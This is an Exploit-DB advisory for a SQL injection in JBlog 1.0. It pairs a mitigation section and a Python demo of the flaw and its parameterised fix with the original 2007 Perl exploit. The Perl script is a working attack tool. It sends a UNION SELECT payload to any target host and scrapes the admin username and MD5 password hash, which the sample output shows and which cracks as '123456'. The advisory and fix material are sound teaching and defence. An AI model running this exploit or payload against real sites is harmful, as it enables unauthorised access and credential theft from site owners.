Author: S4mi
Vulnerability: Remote SQL injection Exploit
CVSS: N/A
Product: JBlog
Affected version: 1.0
Patch exists: NO

JBlog ver 1.0

JBlog ver 1.0 uses the 'id' request parameter in an SQL query without sanitising it, both in index.php (reachable without authentication) and in admin/modifpost.php (which, as the author notes, requires access to the admin area). An attacker can therefore append a UNION SELECT to the post lookup and read arbitrary rows from the database. The proof of concept sends a single GET request to index.php with id=' union select 0,login,pass,3,4,5 from auteur WHERE id=1/*: the leading quote closes the string literal around id, the UNION pulls the login and password of user id 1 (the admin) from the 'auteur' table into the columns of a post, and the unterminated /* comments out whatever the script appends after the parameter. The script then scrapes those two values from the HTML where a post's title and author would be rendered. The password is stored as an unsalted MD5 hash; the hash in the author's sample output, e10adc3949ba59abbe56e057f20f883e, is MD5 of "123456".

Mitigation:

No vendor patch was available when this was published, so the fix has to be made in the code. Never concatenate request parameters into SQL: use prepared statements or parameterised queries (JBlog is PHP, so PDO or mysqli with bound parameters), and since 'id' is numeric, cast it to an integer or reject non-digit values before the query runs. Beyond the injection itself, store passwords with a salted, slow hash (password_hash/bcrypt) rather than plain MD5, so that a leaked hash cannot be cracked instantly the way the sample "123456" hash can; restrict access to the admin/ directory; and use strong, unique admin passwords so that a recovered hash is not immediately reusable.
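Added example (not JBlog's code and not part of the advisory): the advisory's UNION payload replayed against an in-memory SQLite database in Python, beside the parameterised query the mitigation calls for, plus a wordlist lookup showing why the leaked unsalted MD5 is as good as plaintext. The 'auteur' table, its 'login'/'pass' columns and the payload string come from the advisory above; the 'articles' table, its six column names and the sample rows are assumptions chosen so that the UNION lines up with what index.php would select.

```python
"""Added example: JBlog 1.0 style UNION injection against a constructed
SQLite database, beside the parameterised query that stops it.

Not JBlog's code. The 'auteur' table, its 'login'/'pass' columns and the
payload come from the advisory; the 'articles' table, its six columns and
the sample rows are assumptions made so the UNION lines up.
"""
import hashlib
import sqlite3

# MD5 of "123456", the hash shown in the PoC's sample output.
ADMIN_HASH = hashlib.md5(b"123456").hexdigest()

# Advisory payload, URL-decoded. The leading quote closes the string literal
# around id, UNION appends one row of auteur in place of a post, and the
# unterminated /* comments out the quote the script puts after $id.
PAYLOAD = "'union select 0,login,pass,3,4,5 from auteur WHERE id=1/*"


def make_db():
    """Constructed sample database standing in for a JBlog install."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE auteur (id INTEGER PRIMARY KEY, login TEXT, pass TEXT);
        CREATE TABLE articles (id INTEGER PRIMARY KEY, titre TEXT, auteur TEXT,
                               contenu TEXT, date_pub TEXT, cat TEXT);
        INSERT INTO articles VALUES (1, 'Hello world', 'admin', 'First post',
                                     '2007-09-14', 'news');
        """
    )
    db.execute("INSERT INTO auteur VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    return db


def fetch_post_vulnerable(db, post_id):
    """The pattern the advisory describes: the request parameter is pasted
    straight into the query text, so the database parses it as SQL."""
    sql = "SELECT * FROM articles WHERE id='" + post_id + "'"
    return db.execute(sql).fetchall()


def fetch_post_fixed(db, post_id):
    """Parameterised query: the same payload is bound as a value and can
    only ever be compared against the id column, never parsed."""
    return db.execute("SELECT * FROM articles WHERE id=?", (post_id,)).fetchall()


def fetch_post_strict(db, post_id):
    """Belt and braces for a numeric id: reject non-digits before querying."""
    if not post_id.isdigit():
        raise ValueError("id must be a positive integer")
    return db.execute("SELECT * FROM articles WHERE id=?", (int(post_id),)).fetchall()


def crack_md5(digest, wordlist):
    """Why unsalted MD5 makes the leak worse: a tiny wordlist recovers it."""
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == digest:
            return candidate
    return None


if __name__ == "__main__":
    db = make_db()
    leaked = fetch_post_vulnerable(db, PAYLOAD)
    print("vulnerable:", leaked)
    print("fixed:     ", fetch_post_fixed(db, PAYLOAD))
    print("cracked:   ", crack_md5(leaked[0][2], ["password", "admin", "123456"]))
```

Run it directly to see the three results. The sqlite3 module accepts the same '/*' trick because, like MySQL, SQLite's tokenizer treats an unterminated block comment as running to the end of the input. The strict variant is what the fix should look like for a numeric id: parameterise, and refuse anything that is not digits before the query ever runs.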
Source (Exploit-DB raw data):

##################################################
#	Script....................................: JBlog ver 1.0
#	Script Site...........................: http://www.jmuller.net/jblog/index.php
#	Vulnerability........................: Remote SQL injection Exploit
#	Access..................................: Remote
#	level......................................: Dangerous
#	Author..................................: S4mi 
#	Contact.................................: S4mi[at]LinuxMail.org 
##################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39 .....
#
##################################################
#Vuln :
#http://127.0.0.1/jblog/index.php?id=[SQL]
#http://127.0.0.1/jblog/admin/modifpost.php?id=[SQL]  (should have access to admin area "use my last JBlog Xploit")
#Probably Other files are affected
#*************************************
#Usage  :       C:\Xploit.pl  127.0.0.1  /Jblog/
#Result Screenshot :
#*************************************
# Connecting ...[OK]
# Sending Data ...[OK]
#
#  + Exploit succeed! Enjoy.
#  + ---------------- +
#  + Password: e10adc3949ba59abbe56e057f20f883e
#  + Username: admin
###################################################

#!/usr/bin/perl
# JBlog 1.0 remote SQL injection PoC (S4mi, 2007-09-14). Sends one crafted GET
# to index.php and scrapes the admin login and MD5 password hash out of the
# HTML where the post's title and author would normally be rendered.

use strict;
use warnings;
use IO::Socket;

header();

usage() unless (defined $ARGV[0] && defined $ARGV[1]);

my $host = $ARGV[0];
my $path = $ARGV[1];
$path =~ s{/+$}{};    # "/JBlog/" -> "/JBlog", so the request path has no "//"

syswrite STDOUT, "\n Connecting ...";

my $sock = IO::Socket::INET->new(
    PeerAddr => $host,
    PeerPort => 80,
    Proto    => 'tcp',
);

die "\n Unable to connect to $host\n" unless $sock;

syswrite STDOUT, "[OK]";

# Payload (URL-encoded). Together with the leading quote sent in the GET line
# below, it closes the string literal around id, UNIONs the login/pass of
# auteur id 1 into the post's columns, and the unterminated /* comments out
# whatever the script appends after $id.
my $inject = "union%20select%200,login,pass,3,4,5%20from%20auteur%20WHERE%20id=1/*";

syswrite STDOUT, "\n Sending Data ...";

# HTTP header lines end in CRLF; "Connection: Close" makes the server hang up
# after the response so the read loop below terminates.
print $sock "GET $path/index.php?id='$inject HTTP/1.1\r\n";
print $sock "Host: $host\r\n";
print $sock "Referer: $host\r\n";
print $sock "Accept-Language: en-us\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n";
print $sock "Cache-Control: no-cache\r\n";
print $sock "Connection: Close\r\n\r\n";

syswrite STDOUT, "[OK]\n\n";

# The injected row is rendered like a post: the hash lands inside
# <span class='titre'>, the login in a single-quoted field. The second regex
# is loose and will also echo any other quoted token on the page.
while (my $answer = <$sock>) {
    if ($answer =~ /class='titre'>(.*?)<\/span>/) {
        print "+ Exploit succeed! Enjoy.\n";
        print "+ ---------------- +\n";
        print "+ Password: $1\n";
    }
    if ($answer =~ / '(.*?)' /) {
        print "+ Username: $1\n";
    }
}
close $sock;

sub usage {
    print "\nUsage   : perl $0 host /path/ ";
    print "\nExample : perl $0 www.victim.com /JBlog/\n";
    exit(0);
}

sub header {
    print q(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script.................: JBlog ver 1.0
Script Site............: http://www.jmuller.net/jblog/index.php
Vulnerability..........: Remote SQL injection Exploit
Access.................: Remote
level..................: Dangerous
Author.................: S4mi
Contact................: S4mi[at]LinuxMail.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
}

# milw0rm.com [2007-09-14]